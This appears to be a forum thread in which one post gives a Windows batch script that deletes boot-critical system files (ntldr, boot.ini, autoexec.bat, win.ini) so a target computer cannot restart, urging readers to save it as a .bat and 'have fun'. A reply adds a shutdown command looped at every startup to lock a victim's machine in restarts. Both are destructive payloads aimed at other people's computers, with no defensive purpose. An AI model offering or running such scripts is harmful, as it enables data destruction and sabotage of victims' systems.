Originally posted by elsoadfan
How to shut down a computer FOREVER!!
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste the above ^^. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...
REMEMBER - DO NOT CLICK THIS FILE. (for the noobs)
Whoa, this is kinda really old school.
You should try this:
Winblows:
shutdown -r -t 5 -c "You just got pwned"
*nix: (note, you need to be a super user, i.e. root)
shutdown -r -t 5 "You just got pwned"
Put that in a .bat and call it in every time the computer starts.
Flags explained:
-r = restart
-t = countdown
-c = comment, none under unix
Have fun